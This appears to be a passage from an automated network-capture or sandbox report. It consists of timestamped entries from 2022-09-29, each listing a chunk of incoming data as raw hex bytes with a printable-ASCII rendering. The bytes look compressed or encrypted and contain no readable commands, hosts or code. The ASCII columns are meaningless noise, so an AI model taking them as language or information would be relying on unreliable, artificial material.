                                                                                                                                                2022-09-29 12:48:34 UTC1098INData Raw: 96 bf 66 38 cc 43 d4 13 22 c6 10 02 6f fa 84 7a 7b c3 00 59 d2 cd d8 b9 78 1a 0b c3 fb da 5d ad b1 7b 42 2e 8a 2d 86 d4 41 c7 48 62 82 c5 06 5c e0 65 bb b2 15 0a 45 5e 80 fa 1b 34 a6 68 f2 95 a9 64 c3 cc a1 28 e9 49 b1 09 9b e9 50 1e e9 97 e8 5a ec 6d 95 a6 12 9f 49 d1 35 a9 1b eb 36 0d 53 51 ab 6c d5 d4 04 76 27 29 e7 d4 a3 c1 14 70 55 f2 ac 61 2c ea 9f 3b f9 b6 15 1c 46 7b e0 96 b3 2a 8f 9a 43 e7 fa 4b df 21 bd 48 c6 c1 67 03 f0 3b b8 0a 29 70 42 1c e4 3f e9 5a cc db bd fa 6a 1c c6 08 ec ee 5c f8 a7 69 e3 00 02 32 24 59 e8 d2 49 5f 25 83 ba 3c 70 6e eb 24 10 c1 11 86 6a 1f 22 2e e0 be c9 f4 05 de 52 1b 23 ba 1d 87 39 45 84 fc 2a 54 40 9f 79 52 dc 62 e9 09 82 ad 4e f1 0b 38 8e 96 bd 26 f5 19 4f ec 81 d6 94 bf 51 51 9e 7b 47 3d f4 e4 10 32 b5 50 ca ee 71
                                                                                                                                                Data Ascii: f8C"oz{Yx]{B.-AHb\eE^4hd(IPZmI56SQlv')pUa,;F{*CK!Hg;)pB?Zj\i2$YI_%<pn$j".R#9E*T@yRbN8&OQQ{G=2Pq
                                                                                                                                                2022-09-29 12:48:34 UTC1099INData Raw: da a9 e5 4d bd cb 45 0c 40 34 66 b9 88 d0 06 7e 4b 8c 89 ec c1 44 b7 1f bc 02 1d c0 e9 f1 47 55 dd 2b 8a e7 08 01 f6 0f ff 06 98 55 66 28 bd a2 fc cb 7f a8 64 72 5c 52 08 bf d5 f1 14 c8 40 7b 60 d1 94 38 fb a7 c5 e4 6e 92 ce 61 41 5f 6e 27 79 b7 e0 f5 37 2f ef e1 82 4f 3f 05 54 f1 e2 ea 2f 61 9c ea c0 aa 61 dc 6d fc 99 fe 2c 67 7a 9e ec 70 c7 93 1e 03 64 b4 58 63 d6 a9 99 1c c8 b2 cc 7a c6 f6 0d 82 44 07 e5 47 f1 87 26 de 56 ac 55 61 31 bd 8c e3 f0 d3 c4 d1 22 4f 80 99 c9 ea 9d 6f 79 04 51 c8 e7 66 ff a8 b6 1b f6 62 43 b3 5b 96 74 b1 96 57 d6 cd c2 e4 24 4a 90 fd 60 e1 ca fe c0 b0 16 45 e0 2c d9 51 e3 12 3d 8b 98 09 c2 3a a4 12 a9 70 14 8f 37 21 13 66 14 82 e3 3d 0a b8 8b d7 67 c4 78 90 85 3f fa 95 6d 19 7f 07 3f 4b 2f ab 55 ee f5 43 32 64 0d fa 45 b2 e4
                                                                                                                                                Data Ascii: ME@4f~KDGU+Uf(dr\R@{`8naA_n'y7/O?T/aam,gzpdXczDG&VUa1"OoyQfbC[tW$J`E,Q=:p7!f=gx?m?K/UC2dE
                                                                                                                                                2022-09-29 12:48:34 UTC1101INData Raw: 33 f5 ca 3b 57 f9 04 3f c4 9f 94 ce 28 77 a4 b7 52 ad 5a fa 98 8d 75 5b e5 bd 8d 2a 9b bf 23 55 83 2c 42 c7 cc f8 97 b3 11 9b a3 fb 71 08 98 5d 1c 03 9d ca bb e3 1e 89 29 42 e6 48 7f 6f fd 92 ca b2 48 b2 64 f2 8b f7 cf bd a4 a9 77 e4 01 57 f2 2a 56 64 11 8d 88 0e 5c 60 71 a9 c4 30 a5 13 10 db 4b 0a 15 a1 bd 50 0e 94 fd 26 98 64 6f 8c 3e 2f 8a cb 27 d0 af be 1e 14 56 5d 41 08 51 59 26 bd 72 e8 44 cd 28 3d 71 6f 8f db 39 a6 5f 7a 48 e9 db 9d 8d 30 c1 dc de 84 55 35 23 ba de 94 a3 ae 83 0e ed d6 b4 f0 f0 7e ee 93 38 e8 14 7a 76 85 6a 9d 58 81 b5 ee 32 ed 52 18 87 aa d0 b1 14 04 45 37 81 54 a1 a3 a5 2c 57 17 c9 a7 a0 9f 8b b1 d2 64 97 f1 ac 27 71 3c 99 1d 96 50 13 9c e7 96 19 3c 1a 91 09 9e 62 91 b8 0b 93 80 6f a2 7c 42 74 d4 28 b4 8e 64 83 65 fb 8f 79 41 28
                                                                                                                                                Data Ascii: 3;W?(wRZu[*#U,Bq])BHoHdwW*Vd\`q0KP&do>/'V]AQY&rD(=qo9_zH0U5#~8zvjX2RE7T,Wd'q<P<bo|Bt(deyA(
                                                                                                                                                2022-09-29 12:48:34 UTC1102INData Raw: 2d 29 47 15 79 29 ab 37 7c c1 a3 61 9a 0b ce d5 9f ce 03 be 8e 18 ee 14 e9 94 8b bc 57 e4 85 c6 02 59 d9 0a 0e 6e 4d a8 c8 e8 3f f2 1c fa f8 4d e5 e2 5d eb b3 78 70 4a a0 6c 4c b8 ce 10 ee b2 f8 3a 55 ac 84 00 f9 e9 ff b0 2a 90 97 a3 31 98 48 3f 9b 29 55 c6 ab 4d c6 e6 92 17 db b8 2a 56 90 e7 18 94 cf fd 5d 6e 7f 7c 55 16 1d 67 bd d9 9b 7a 94 58 0d f7 ac b1 4f 10 4d 05 90 74 b7 f8 f6 0e e6 4c 9f 53 5c fc 5a 06 16 1f 77 6b b6 2b 4c 6a 7a c1 4a 22 97 7e c5 14 17 81 e8 80 bc 43 4f a3 a2 4f 51 37 60 fd 94 37 39 94 fe c7 8e 58 44 fe ed cc 35 d2 34 af 8e e7 1d 9e 14 f4 93 d3 b9 72 c7 cb 4a b8 82 d9 5e 0f b4 bf 43 8b 45 14 ef 20 69 e8 fa 87 a5 de 15 93 0e 54 05 d6 c2 77 c8 6c 86 c5 3d f2 17 37 26 8c b5 ff 61 97 42 a7 52 e5 97 e2 c7 24 2e ab ec 7d 65 78 8f 00 54
                                                                                                                                                Data Ascii: -)Gy)7|aWYnM?M]xpJlL:U*1H?)UM*V]n|UgzXOMtLS\Zwk+LjzJ"~COOQ7`79XD54rJ^CE iTwl=7&aBR$.}exT
                                                                                                                                                2022-09-29 12:48:34 UTC1103INData Raw: 3b 3c 52 f7 d4 e3 73 31 94 e6 5a 45 61 2e 60 8a 6c 46 ef 41 15 f6 16 1a 47 1b 3f c5 af b1 4a 87 5c a6 8e 4f d5 a3 1f 21 5c 42 54 f0 cd 68 4b a8 18 cf e0 46 4f a0 69 f4 51 d5 15 ce d1 05 a5 09 d1 3c e3 59 26 22 3d d0 88 82 c0 b3 17 b1 cd 51 b2 5a c5 7a da 35 87 37 54 5b 2f 12 e1 7f 9b 7e 17 72 f9 ef c3 28 cb bb 0a 2e dd f2 ce e3 01 fe bd 34 e5 6f 85 78 8b e4 3f e1 f1 6a 1f e7 f3 ac bd 9c 83 dc b5 fc d9 bb d4 b8 98 63 6d c9 6d b8 57 1d 3e 1d b6 db b1 9e 7a 51 bb 5d 98 df f4 99 1f 88 6e ce 76 e0 f2 43 a6 06 ef 45 86 a0 0d 6d 00 0c ce be 0b 5e 4c 6e a9 10 ce 30 b0 60 ce 2c 77 2b 36 f4 e7 3c 15 2a ec 64 7e 37 ce bb f2 5c a9 a7 26 66 ec 9e fb 39 64 8b 29 b2 2d a0 65 5a 48 29 c3 79 2e a4 66 89 97 66 41 8a 5a fb 5c ef dc c8 a0 1f 1c 36 db 21 07 61 29 6f bd db 35
                                                                                                                                                Data Ascii: ;<Rs1ZEa.`lFAG?J\O!\BThKFOiQ<Y&"=QZz57T[/~r(.4ox?jcmmW>zQ]nvCEm^Ln0`,w+6<*d~7\&f9d)-eZH)y.ffAZ\6!a)o5
                                                                                                                                                2022-09-29 12:48:34 UTC1105INData Raw: aa 7f 01 94 af 0a 45 e3 61 1d fb b2 db b8 2a 79 94 6f af 4b ea c3 38 df 20 a6 80 44 31 6b 63 59 88 3c bb 65 c6 4d c0 bf 3c 1e 90 28 41 a2 46 f8 97 33 51 3a 99 90 f7 72 03 4a 11 8a ab c7 c0 22 39 e1 20 87 bf 7e 26 85 44 5f 4d 4e 64 82 65 6c df 62 0c d2 5d 56 0b 8a 10 72 df 31 5c 20 d3 00 16 e9 be 00 7c d3 c2 1c 8f a3 da 92 1d 46 2c 4f 0d 4f 7a 4f a4 de 87 ce 33 de 1b f1 8f 2a fe 1b 84 5c 23 70 5c cd 05 8a 34 a3 d9 88 8b 81 19 03 a6 d3 9f c1 5a cd b9 08 d4 4f 24 b9 f7 83 03 27 c3 35 44 fc ce b9 a0 57 e5 14 f1 3d 3a 29 01 a7 80 ca 84 6b 9d a2 a5 d8 9c df 4e 18 79 8b 3a 38 bb 98 af d2 83 3b 69 cf e9 08 5a dd 59 8b 6e f0 37 46 21 91 f6 cd 6b 3b 6c f2 d6 f4 42 6f 20 fe e6 4c 22 34 7e 2d 14 c8 e9 a1 b9 47 6c 1e 49 3f 48 74 ed 85 ff c5 a8 36 72 fc 6f e9 43 53 66
                                                                                                                                                Data Ascii: Ea*yoK8 D1kcY<eM<(AF3Q:rJ"9 ~&D_MNdelb]Vr1\ |F,OOzO3*\#p\4ZO$'5DW=:)kNy:8;iZYn7F!k;lBo L"4~-GlI?Ht6roCSf
                                                                                                                                                2022-09-29 12:48:34 UTC1106INData Raw: 6f 4d 39 b6 d8 d4 94 f1 8e 5f 34 24 01 42 b4 ac 31 35 68 22 dd 5c 21 17 36 fc 16 5f 8d 8f a4 6c 6f 18 36 1c 9e 99 f4 d2 f5 56 27 c0 61 da 50 cb 2d 80 86 01 14 ba 5d ae e1 1c 6e 13 ff 63 c3 13 98 79 7b eb 52 fe c7 90 96 fe 55 5a a6 14 77 a0 d3 52 83 38 c7 ea f4 c3 ff a9 bc b6 79 69 ed d6 6a ec f1 62 aa 0c ca fe c1 8e 7b 5d f8 8a ac fb 78 7d fd 01 95 71 bc 40 1a c9 40 e1 52 a3 18 94 17 40 36 ab 69 ed ad 38 0e 39 04 55 20 26 c0 20 2e b5 ab 7e a4 a3 8e 08 50 0b c6 fd d1 47 44 ae 04 f6 01 e3 f0 1b f1 12 21 42 e8 32 ea c3 52 84 d9 66 4d 46 7a ac 38 7f 50 ff 8f 72 10 40 bb a7 f5 37 54 fd d0 1f 74 24 de c2 bd 51 6b 55 9d 64 f0 6a 6e 12 6f b5 57 f9 f3 ea 2e e8 bb 41 d6 e6 6e ba 0a 31 04 6e 04 b7 09 d5 7b cb 7d 8d 2b 0c 23 4b 78 09 d8 89 69 80 b7 8f cd c9 c0 3b 4d
                                                                                                                                                Data Ascii: oM9_4$B15h"\!6_lo6V'aP-]ncy{RUZwR8yijb{]x}q@@R@6i89U & .~PGD!B2RfMFz8Pr@7Tt$QkUdjnoW.An1n{}+#Kxi;M
                                                                                                                                                2022-09-29 12:48:34 UTC1107INData Raw: 6a 11 0d 04 f8 40 b1 c4 aa 28 56 f1 91 d6 a8 4c c2 60 90 09 b3 b9 92 79 56 f4 11 93 a7 9e 12 5c fe 82 a2 f7 57 ca 56 3d 79 67 87 29 0e 67 57 0f 58 d7 05 4c 7c 76 e0 ab 5e a5 93 3b ba 04 63 a5 cd 6e 5a 7e 73 58 88 33 71 21 65 58 23 6c 5d b2 a2 af 19 e3 1d f3 74 b5 da 20 7e 22 59 59 fb 5d 1e d6 2d 4f f1 d5 d1 13 78 d8 59 b5 16 d7 b4 fc 47 2c 8b c7 70 3e 12 1c 29 5b f1 cf 0f e6 88 b7 1a 61 c4 25 26 d5 b2 d6 72 ed 9b bd 74 74 b4 3b cd bf 31 5f 08 2b d1 6b e0 c1 ab 1c ce 08 77 53 fa 97 06 96 49 67 6a 77 68 aa ea b8 ac 2a db c7 a9 c1 27 51 d2 45 d5 8a c9 c5 d8 4f 0e 26 56 39 3a 46 c3 9f af f4 6e 8c c7 ba 2e 6f c2 07 12 c0 2a bf 5d 80 cc cf 21 dc fb e6 5d b4 20 96 1b 56 76 78 c8 54 dd b0 49 6f 0c e5 3f cd ce 0f 86 a0 19 69 48 90 9e 19 80 2c 7e 31 a2 de 3b 88 6f
                                                                                                                                                Data Ascii: j@(VL`yV\WV=yg)gWXL|v^;cnZ~sX3q!eX#l]t ~"YY]-OxYG,p>)[a%&rtt;1_+kwSIgjwh*'QEO&V9:Fn.o*]!] VvxTIo?iH,~1;o
                                                                                                                                                2022-09-29 12:48:34 UTC1109INData Raw: d9 1b 67 51 39 8b e0 bd 70 e9 e6 ea d3 1f 30 1f f5 24 9c 67 f0 e8 9a fd 20 4a 18 5e b6 64 70 2f 33 c6 f9 b8 63 0e 3e a0 53 a4 04 0b 27 26 ca bf 4c 7b 91 51 21 b7 48 74 21 93 06 ff 99 40 0c 93 b3 54 22 5d db 44 a7 aa 5c a3 3e 28 b4 fa 69 a8 3e 77 5e ae a2 20 04 b7 11 8c 55 e0 ff 96 9b ec 82 d0 28 fc 9c 5c e6 b3 69 e6 f9 2d 43 64 9b 7b 7d 43 ff de 75 c5 05 07 c2 69 cf 61 73 f2 0e 17 4a 51 5c 20 81 35 28 a6 fa 87 be f0 8b 7a e9 54 8a 8d 56 1b 34 2e 2d 8c 70 ce 6d 38 e2 c4 aa e2 f7 17 5c 76 9b 1e b4 32 dd 78 99 3a 8c be 74 27 ef c8 e3 14 28 6f 33 14 74 77 53 c8 ad 13 da 39 b0 ad 59 29 82 02 09 d1 22 2f 54 fe 54 bc 91 ef a3 af 9e 64 ea 5e 2c 79 18 09 e3 50 30 33 bf 68 23 2e 96 5c 8f 3c 91 18 14 d0 0b 00 e8 12 84 53 02 31 a3 8a b0 5f 0b 2e ae fa e8 37 d1 cb 15
                                                                                                                                                Data Ascii: gQ9p0$g J^dp/3c>S'&L{Q!Ht!@T"]D\>(i>w^ U(\i-Cd{}CuiasJQ\ 5(zTV4.-pm8\v2x:t'(o3twS9Y)"/TTd^,yP03h#.\<S1_.7
                                                                                                                                                2022-09-29 12:48:34 UTC1110INData Raw: d2 2b 20 5e ed fe b7 e1 d3 11 99 eb a6 21 ac 2a 8e 2f 8f a6 c8 ae 2b 40 73 94 59 54 ba 62 20 12 57 d2 0e 3f 02 16 3b 34 fb 04 f1 04 61 74 bd b2 09 2d 23 c7 7a 53 b8 12 18 8a 35 4d 2f 3b ab e6 83 91 24 e7 a8 ee de a4 88 5d 71 d0 f7 54 0d 05 c7 79 84 9e 6f 44 b4 74 f8 0c d8 d0 f9 59 ef 2d 00 b1 b8 bd 3e 48 7f 8a 3c 5d 71 b3 df 6b 55 17 cb 0f 52 d3 41 10 3c 72 0f 59 fd 26 c6 14 04 69 32 79 0b dc 87 b7 ee 46 11 44 95 11 5c 2e 32 e6 4d b1 fa 82 f9 2c 63 6e c6 8f b4 13 28 48 40 4b 9d ee 5b fc e3 2c 06 8b 4f c6 cd bf 2c 18 a8 fc c9 97 b9 5c b6 b5 d0 65 21 54 5d 15 55 62 6d 65 cd 19 05 66 c9 c8 05 76 50 0a a2 cf 2f 17 7f 00 ce 2e 8a 70 8d 8f 2a 8d a1 83 97 81 2a 28 6d 2a 4d b4 22 e8 6f ea 7b 0e dd 09 a7 0f 8b 42 36 4d 86 b9 c7 4b ac c5 e5 72 af 07 b0 04 1e bf f0
                                                                                                                                                Data Ascii: + ^!*/+@sYTb W?;4at-#zS5M/;$]qTyoDtY->H<]qkURA<rY&i2yFD\.2M,cn(H@K[,O,\e!T]UbmefvP/.p**(m*M"o{B6MKr
                                                                                                                                                2022-09-29 12:48:34 UTC1111INData Raw: 42 58 d5 1d f0 9a 1a 66 70 54 02 f7 a8 0b de 95 3b da 29 52 ed cb 1a c7 8b 25 12 74 52 9d dc 34 5f d1 6a 52 db f0 25 cd b5 39 e4 71 fb 23 81 c1 ac be 91 cc 07 bd d6 b9 11 53 29 83 a3 53 20 72 f2 03 ed 57 7a cc 3a 75 34 8b 2d df b6 78 7c 4f 1a b1 1e 04 83 56 37 92 c7 73 be ab 1e a2 3e c0 d1 cc 0d b7 01 3f ae 4f 04 59 10 bf 1f e9 e2 2b 92 8e cb 63 89 f3 70 12 9b c9 28 6f 55 74 c1 e1 39 3e 1e 45 df dd f6 1d ac b0 8b 83 35 f7 d2 be c1 e3 68 ef ef d5 7e 23 9a 06 58 3d 39 70 ba 7b 7c 26 76 72 b4 12 3d 1d 26 5e eb 2c 2d 14 c2 c6 3f 8b e6 28 0f d9 e4 96 77 9f 16 27 c7 f9 21 f4 42 08 9b 10 14 2f c4 82 e0 14 e2 d0 78 20 d0 f0 ee bc 3f 21 35 5d 36 1a 79 06 e8 b5 97 2a 09 2d c3 8f 72 da 25 fa 31 fb 23 88 03 0d c8 90 e3 65 47 3f 65 cf 4f 4c 50 45 f0 fb 4c af 28 b8 e7
                                                                                                                                                Data Ascii: BXfpT;)R%tR4_jR%9q#S)S rWz:u4-x|OV7s>?OY+cp(oUt9>E5h~#X=9p{|&vr=&^,-?(w'!B/x ?!5]6y*-r%1#eG?eOLPEL(
                                                                                                                                                2022-09-29 12:48:34 UTC1127INData Raw: 5a 44 2f 0c 35 30 15 3c d2 9d 32 eb 71 e4 20 ed ce 0b de 7f 67 be ba 98 70 e6 b3 5d 04 5e ea da 04 01 ea 07 f9 07 2b 53 5b cd 47 28 7a 1d d9 9c f2 03 fb 52 be a0 df 79 79 32 d1 98 90 72 6b 25 98 90 30 90 73 5b c0 ff 64 99 d6 fd 49 5e 40 42 02 f5 15 da 3e 1e fa 2d 4f 7a 5a eb d6 26 4a 7c a3 92 fe 70 1a 43 68 ad ca 73 f4 de 00 bb 26 d8 c7 06 1d 6c 8e b7 a6 bf 80 d6 9a 12 0d cc 0d e3 b7 9c 54 ed 6e 5d 9f 1b 55 6d 61 f8 56 5e 46 b7 44 0b 16 22 ac 00 b5 9a 40 47 73 f2 e1 c9 4f 6e b9 65 e9 4a 32 95 32 5a 81 04 bc 84 53 b4 67 35 55 ff cb ee e6 57 58 1d f9 bc 18 c1 ed 86 d4 45 7a 2d 33 69 68 03 f1 9f a0 89 f1 f1 c5 4d a5 be f6 bf 85 ec 59 6d 10 7e 1d 9b f9 4d 8b 79 b7 b0 2b 25 d9 a7 03 93 1b 16 08 b7 ab 28 de c1 fc b2 62 2d c3 df bb f4 52 7d c4 fd 48 f1 45 a5 6e
                                                                                                                                                Data Ascii: ZD/50<2q gp]^+S[G(zRyy2rk%0s[dI^@B>-OzZ&J|pChs&lTn]UmaV^FD"@GsOneJ22ZSg5UWXEz-3ihMYm~My+%(b-R}HEn
                                                                                                                                                2022-09-29 12:48:34 UTC1143INData Raw: 5a 4a 4e ee 85 80 b6 66 ca 32 fe 4b 04 ca a4 ec 65 d9 5c d5 43 76 84 10 6d 0d c9 14 fe 02 d5 72 53 67 56 36 23 6a 05 3e 8b 88 68 87 ae 78 58 72 67 4d 49 8b 22 d5 9c 73 1f 63 e5 82 16 6e d2 84 d0 5e 84 a4 66 a9 0b dc 10 b0 98 22 d3 8a d4 5d e4 88 f0 3b 6e f3 8d e6 a1 d1 0b 1b 3f 3c a0 2f 62 4a 09 03 e7 33 26 94 d8 34 31 1d f5 58 bd df f1 70 f3 be 8a 76 1f b1 c7 67 be 4a 3f c1 5e 57 53 c3 84 16 71 c2 6f 70 f6 e8 38 92 c3 69 37 eb f9 ef f0 8e 89 fc b1 72 41 31 9e 28 86 97 2f 33 3c 21 66 e8 54 28 da 33 df 0c 01 e7 33 a9 70 88 03 10 2a b0 cc 87 b1 e9 08 2d 12 6c b4 49 ac ed 25 de 2e 7a 2b b8 4c b5 a2 d2 72 9d 96 85 48 9e 4a 5a 59 f2 84 08 c9 4f f6 9c 14 8e ea 50 69 32 5c da 5a ba 13 26 9a 7c 5e 6f b0 e7 8c e1 0f 6b bf 34 de 9f 80 12 32 18 f7 a0 71 72 2b 0d cf
                                                                                                                                                Data Ascii: ZJNf2Ke\CvmrSgV6#j>hxXrgMI"scn^f"];n?</bJ3&41XpvgJ?^WSqop8i7rA1(/3<!fT(33p*-lI%.z+LrHJZYOPi2\Z&|^ok42qr+
                                                                                                                                                2022-09-29 12:48:34 UTC1159INData Raw: 90 08 d6 a9 91 f6 a1 a6 40 fc a0 a1 8e 7c 9c f7 0b 5e aa cf 29 54 ca 5b 00 e5 6f 55 45 ce e3 42 44 d3 c1 3e f1 b0 69 33 74 75 4f ef 4d a2 07 80 e8 89 fb 7b 71 b4 f1 8b bf c8 8e 32 b1 be 44 a9 3e f8 c6 2d 27 85 71 31 b7 45 b6 b8 16 44 b8 fc 0e 37 d9 55 02 d1 30 cd 62 f4 e6 ec 19 83 bc 11 69 24 2a 53 b7 de fb 67 59 4a 42 6a 04 58 cc d0 48 19 f6 cf c0 4a 50 3a 28 12 8b 2d 2b fa 0e 43 56 bc 99 4a 39 61 e3 07 f4 08 87 ca 4b be 60 db 17 43 35 c8 fa 76 c1 52 56 9a 8e 08 79 d7 c8 04 82 28 9c b8 c7 ff 06 a4 62 a1 e2 8f 72 ab ee d9 6b bd 43 c1 af 67 cf bd 4c 5b ce ce 55 9a 49 02 b4 6a 33 9d f4 f2 88 84 1a ad 98 80 00 dd 5f e8 18 a7 68 df 95 02 30 d5 7f 43 1e a0 6a 89 e0 28 bf eb 37 78 0c 20 74 a2 f9 90 4b b6 4c 87 0e 72 be ca 67 b2 1b 3d 5f 07 24 cb d5 b4 4c ac 15
                                                                                                                                                Data Ascii: @|^)T[oUEBD>i3tuOM{q2D>-'q1ED7U0bi$*SgYJBjXHJP:(-+CVJ9aK`C5vRVy(brkCgL[UIj3_h0Cj(7x tKLrg=_$L
                                                                                                                                                2022-09-29 12:48:34 UTC1175INData Raw: 17 07 95 37 40 b9 c8 ec 5c 0b 47 13 65 63 63 0c 01 f0 a4 c3 5b 2c c1 fd 20 19 d3 d3 75 a9 be 81 3d 5e dd 64 af c0 8d 84 f0 d5 20 dd c3 6f 7e f8 4c 5d f0 fe 8d c9 34 1e 58 0a ea cb e8 57 0d ba 4c 3d e9 04 98 e3 cb 4a d4 88 47 a3 0d e7 79 52 aa 8b 76 56 22 5a 78 ea 48 6c 33 a7 5b 12 63 7b 3f b0 fa 95 11 68 89 af a5 1a 8d 7a 67 0f 4b e8 37 dd 04 50 67 ed 1b 5b b9 b0 c4 b8 7a 40 f5 56 f1 6a c8 cb 4a c6 46 4e bb 46 6f 10 54 0b f0 5c 25 5a d6 be ca 92 a5 f3 22 04 4f 7f 8a 0d 81 43 fb 52 7a 56 7d 17 4d a2 ef 50 d4 55 b1 cb 88 55 64 a7 c1 26 5c 29 b6 d2 4e 89 48 6d c3 a3 2c 06 c6 11 46 06 bd 20 ac 4b 1c bf d4 c2 b8 b8 30 05 9a c9 c8 2e 9f 55 80 c5 ac 48 c8 8c 81 62 b2 51 a7 1e 33 27 f8 46 ec 4d 0a 2c b8 b0 37 dc 25 5f 76 7f 68 be 85 ca 3b 50 af c3 48 ea 1d 9a a9
                                                                                                                                                Data Ascii: 7@\Gecc[, u=^d o~L]4XWL=JGyRvV"ZxHl3[c{?hzgK7Pg[z@VjJFNFoT\%Z"OCRzV}MPUUd&\)NHm,F K0.UHbQ3'FM,7%_vh;PH
                                                                                                                                                2022-09-29 12:48:34 UTC1191INData Raw: 5d 43 0c a7 a0 10 2f 86 80 81 ac 8a a8 82 d1 eb 16 0d bd 4b a9 92 43 d8 5e 1f b8 6f fc 0f 9f a6 fe f8 5d 1a 88 44 5e 44 90 75 cc c9 4c 97 0a 59 45 21 cd b5 2b f6 03 5f a3 d1 9d 26 88 01 96 62 a9 d0 c3 c5 fc 7f 33 3e 69 92 3d 08 bb 2e 73 6e 4b 54 04 06 ac c0 c2 20 22 fa ed 37 f0 d3 06 37 58 ef 0f a1 0b 12 cd e8 1b e7 e8 db ff 31 e4 26 28 c8 6c 55 ab dc 0e 43 d0 7d 4d 0d ff 2a d9 7d cd d5 92 5d 68 b9 84 66 29 88 92 45 00 36 95 b8 2f 4a b4 16 df ba 5c 2b b4 37 86 12 ca 26 c5 a0 aa da 15 3a 39 c0 79 cd 02 34 29 0e 2b 1c 6e 0f 60 02 31 31 dc 9a ff a8 43 f7 8f d6 e8 ff 36 b2 ff 4e 0f a3 cd 11 65 c4 52 09 27 22 bc e8 c6 e1 0a 0e 66 a4 e1 45 a8 68 38 1b ce 87 33 46 b9 82 ae f2 32 77 b4 11 f3 34 36 12 71 6f 9f 45 e5 2e ae 55 e1 44 b3 c3 0c 02 44 86 8a 6e d6 06 9a
                                                                                                                                                Data Ascii: ]C/KC^o]D^DuLYE!+_&b3>i=.snKT "77X1&(lUC}M*}]hf)E6/J\+7&:9y4)+n`11C6NeR'"fEh83F2w46qoE.UDDn
                                                                                                                                                2022-09-29 12:48:34 UTC1207INData Raw: ef 38 1d ec c3 90 fd 98 e1 45 d0 1d 00 5a 8a 80 e1 8f b4 69 cb f2 2d 98 97 1f b0 36 43 17 8e 5b 90 7e da 25 1c 18 d4 68 df 9c bc bf 85 fa f0 94 20 b4 b8 25 dd 5b 6a db d3 a3 2c dd 86 ec 5a e6 54 d2 89 28 53 88 d3 31 13 91 67 67 af 1c 8b c9 be 27 43 d9 8b e1 57 c8 27 84 79 9a b8 84 46 e6 89 8b e6 f6 13 19 cf 2f d4 b7 ee 50 e2 10 38 3b c1 00 ea cf 86 fa 00 e8 48 5e 10 b3 44 8c 34 5c e8 f9 82 dc c3 e9 14 b9 66 a6 11 87 fc c6 71 7f e0 1f f4 b7 f4 0d e7 8d f7 81 4e a7 ef 0c fa db 98 88 62 2c ea 62 d1 e3 af 22 00 1e ae f1 6c b2 63 f5 82 d3 a5 a1 04 f4 42 7f f8 4c 10 03 98 bc 3a 0d e8 3c 06 10 d8 ef bd 95 4d 4b 84 2e b7 6c 17 69 c5 93 f2 19 5a f9 04 72 71 5d 69 78 99 ee 49 45 d5 7f 01 d4 2a 3c e7 30 c6 91 9c 21 76 9c 95 6b 13 ac 97 d5 62 fc df 33 25 84 78 e9 56
                                                                                                                                                Data Ascii: 8EZi-6C[~%h %[j,ZT(S1gg'CW'yF/P8;H^D4\fqNb,b"lcBL:<MK.liZrq]ixIE*<0!vkb3%xV
                                                                                                                                                2022-09-29 12:48:34 UTC1223INData Raw: f9 97 e9 06 9f 92 02 31 6b ab 3b ae 3f 45 79 ce fb b3 81 1f 92 31 a2 53 1d 06 4e 6a 27 f0 e3 77 63 b3 33 0b 3c 5c 3f 55 66 9e b1 05 1b 88 f6 82 a8 b5 32 db 64 d9 ce 10 7c 30 76 0a 40 cb 8a 12 79 90 15 60 cf ab ed bc fa 6d 2b c6 c9 4c 55 a8 69 2c 5f 14 d4 f7 28 9c 69 9e 4c c2 ed 66 fd 12 59 da d4 27 a4 d3 a9 4b 9a 2b 66 43 28 fc ad c9 0d 5a 1d 5e 48 b5 f3 7c f9 61 f4 a8 1e 92 35 15 00 e7 25 78 e8 fc c7 4a 66 96 d9 0d f2 36 d5 56 f9 33 6b b2 2d 13 87 4a 2a 9b 83 27 d2 e8 03 f4 c5 36 36 70 07 9c 67 3d 93 00 d2 b0 48 f6 e1 30 ce 0b 86 8d b9 91 9b 30 1b dc 65 27 b9 5a f0 4a 2b 29 e8 13 d1 46 13 61 62 01 af 2d d7 79 6f 42 14 bb 71 06 92 de a8 54 ee ca 1e 33 af ac bd 5f 74 62 da 3d d1 d7 56 77 86 92 bb da 34 f1 a3 48 4b 18 3a a1 46 b7 94 ad 49 23 22 75 ac 8c 45
                                                                                                                                                Data Ascii: 1k;?Ey1SNj'wc3<\?Uf2d|0v@y`m+LUi,_(iLfY'K+fC(Z^H|a5%xJf6V3k-J*'66pg=H00e'ZJ+)Fab-yoBqT3_tb=Vw4HK:FI#"uE
                                                                                                                                                2022-09-29 12:48:34 UTC1239INData Raw: f1 8c 9c 00 4e 24 9a fd 0b ce c9 88 32 c3 d3 c5 55 85 9f d4 5b 3b fc 5e 87 dc 51 d2 78 51 2a 42 a7 9c fc 5e 12 39 b2 80 54 1e 58 c1 3c 8b 0e c0 fe 7f 2f 1b 6a 11 30 56 e4 e5 d3 eb 40 f6 27 b3 cf e7 01 01 6d ce 90 58 c2 53 f4 92 91 22 fa 64 42 95 fc a9 be 7c 02 85 17 1b 51 07 10 95 24 ae 5d 07 b0 a3 3a 05 d2 bc 48 fb 71 e6 c2 1d 1f 05 97 ff 90 f9 f7 a6 96 24 e9 ec 2a c4 be 5a 0f 65 80 db 25 56 04 6a e3 da 7c f4 37 65 d9 4d dc 45 a0 f5 6f 19 38 fc 16 ec 67 7c 76 4f 27 3a 22 df c1 1e c8 0a 60 e8 61 63 38 d2 7e 9c b8 82 9f 5e f9 f1 d5 66 8b 64 f3 04 77 47 5f 5d d9 ca 76 97 37 bf d3 28 af 3f 2b 8c d3 d9 0d 3d 57 48 d8 48 72 21 c1 b5 ea 75 e0 51 cf 79 62 b3 ee 30 42 61 45 a3 68 e3 64 b9 94 b7 34 fc 5b e1 8e 4a eb 56 0f f4 3e 77 03 c6 42 2e 00 41 61 1d 44 cb c9
                                                                                                                                                Data Ascii: N$2U[;^QxQ*B^9TX</j0V@'mXS"dB|Q$]:Hq$*Ze%Vj|7eMEo8g|vO':"`ac8~^fdwG_]v7(?+=WHHr!uQyb0BaEhd4[JV>wB.AaD
